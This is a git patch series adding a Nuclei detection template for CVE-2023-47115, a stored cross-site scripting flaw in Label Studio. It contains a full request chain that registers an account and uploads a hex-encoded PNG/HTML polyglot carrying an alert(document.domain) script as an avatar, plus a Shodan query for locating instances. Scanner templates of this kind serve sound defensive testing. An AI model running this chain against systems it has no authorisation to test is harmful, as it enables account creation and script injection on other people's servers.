From fa5123e17d60042de869cd4e8843a7eea624af43 Mon Sep 17 00:00:00 2001 From: isacaya Date: Tue, 30 Jan 2024 01:49:31 +0900 Subject: [PATCH 1/3] Create CVE-2023-47115.yaml --- http/cves/2023/CVE-2023-47115.yaml | 81 ++++++++++++++++++++++++++++++ 1 file changed, 81 insertions(+) create mode 100644 http/cves/2023/CVE-2023-47115.yaml diff --git a/http/cves/2023/CVE-2023-47115.yaml b/http/cves/2023/CVE-2023-47115.yaml new file mode 100644 index 0000000000..c840b9961b --- /dev/null +++ b/http/cves/2023/CVE-2023-47115.yaml @@ -0,0 +1,81 @@ +id: CVE-2023-47115 + +info: + name: Stored Cross-Site Scripting Vulnerability in Label Studio + author: isacaya + severity: high + description: Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website. + impact: | + Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. + remediation: | + Update to version 1.9.2. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-47115 + - https://github.com/advisories/GHSA-q68h-xwq5-mm7x + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L + cvss-score: 7.1 + cve-id: CVE-2023-47115 + cwe-id: CWE-79 + tags: cve,cve2023,xss,authenticated + +http: + - raw: + - | + GET /user/login/ HTTP/1.1 + Host: {{Hostname}} + - | + POST /user/signup/?&next=/projects/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false + - | + GET /api/current-user/whoami HTTP/1.1 + Host: {{Hostname}} + - | + POST /api/users/{{id}}/avatar/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF + + ------WebKitFormBoundarytZZRQ9D2LS0PMsHF + Content-Disposition: form-data; name="avatar"; filename="nuclei.html" + Content-Type: image/png + + {{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}} + ------WebKitFormBoundarytZZRQ9D2LS0PMsHF + - | + GET /api/current-user/whoami HTTP/1.1 + Host: {{Hostname}} + - | + GET {{filename}} HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: xpath + name: csrftoken + internal: true + attribute: value + xpath: + - '/html/body/div/form/input' + - type: json + part: body + name: id + internal: true + json: + - '.id' + - type: json + part: body + name: filename + internal: true + json: + - '.avatar' + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "contains(header, 'text/html')" + - "status_code == 200" + - 'contains(body, "")' + condition: and \ No newline at end of file From 8e2cd75674baf17ba60a10dc20e27dcaea5906a1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 30 Jan 2024 13:25:56 +0530 Subject: [PATCH 2/3] fix-formatting --- http/cves/2023/CVE-2023-47115.yaml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/http/cves/2023/CVE-2023-47115.yaml b/http/cves/2023/CVE-2023-47115.yaml index c840b9961b..b0ea4e139c 100644 --- a/http/cves/2023/CVE-2023-47115.yaml +++ b/http/cves/2023/CVE-2023-47115.yaml @@ -1,10 +1,11 @@ id: CVE-2023-47115 info: - name: Stored Cross-Site Scripting Vulnerability in Label Studio + name: Label Studio - Stored Cross-Site Scripting author: isacaya severity: high - description: Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website. + description: | + Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website. impact: | Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. remediation: | @@ -12,12 +13,19 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-47115 - https://github.com/advisories/GHSA-q68h-xwq5-mm7x + - https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development + - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49 + - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L cvss-score: 7.1 cve-id: CVE-2023-47115 cwe-id: CWE-79 - tags: cve,cve2023,xss,authenticated + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-1649949475 + tags: cve,cve2023,xss,authenticated,intrusive,label-studio http: - raw: @@ -58,12 +66,14 @@ http: attribute: value xpath: - '/html/body/div/form/input' + - type: json part: body name: id internal: true json: - '.id' + - type: json part: body name: filename @@ -78,4 +88,4 @@ http: - "contains(header, 'text/html')" - "status_code == 200" - 'contains(body, "")' - condition: and \ No newline at end of file + condition: and From 9e7e8525c56a33206841081ffac0d7e925bc0b31 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 30 Jan 2024 22:36:51 +0530 Subject: [PATCH 3/3] Update CVE-2023-47115.yaml --- http/cves/2023/CVE-2023-47115.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-47115.yaml b/http/cves/2023/CVE-2023-47115.yaml index b0ea4e139c..37186eefb2 100644 --- a/http/cves/2023/CVE-2023-47115.yaml +++ b/http/cves/2023/CVE-2023-47115.yaml @@ -1,7 +1,7 @@ id: CVE-2023-47115 info: - name: Label Studio - Stored Cross-Site Scripting + name: Label Studio - Cross-Site Scripting author: isacaya severity: high description: | @@ -11,19 +11,19 @@ info: remediation: | Update to version 1.9.2. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-47115 - https://github.com/advisories/GHSA-q68h-xwq5-mm7x - https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49 - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26 + - https://nvd.nist.gov/vuln/detail/CVE-2023-47115 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L cvss-score: 7.1 cve-id: CVE-2023-47115 cwe-id: CWE-79 metadata: + max-request: 6 verified: true - max-request: 1 shodan-query: http.favicon.hash:-1649949475 tags: cve,cve2023,xss,authenticated,intrusive,label-studio @@ -32,15 +32,18 @@ http: - | GET /user/login/ HTTP/1.1 Host: {{Hostname}} + - | POST /user/signup/?&next=/projects/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false + - | GET /api/current-user/whoami HTTP/1.1 Host: {{Hostname}} + - | POST /api/users/{{id}}/avatar/ HTTP/1.1 Host: {{Hostname}} @@ -52,9 +55,11 @@ http: {{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}} ------WebKitFormBoundarytZZRQ9D2LS0PMsHF + - | GET /api/current-user/whoami HTTP/1.1 Host: {{Hostname}} + - | GET {{filename}} HTTP/1.1 Host: {{Hostname}} @@ -81,11 +86,10 @@ http: json: - '.avatar' - matchers-condition: and matchers: - type: dsl dsl: - - "contains(header, 'text/html')" - "status_code == 200" + - "contains(header, 'text/html')" - 'contains(body, "")' condition: and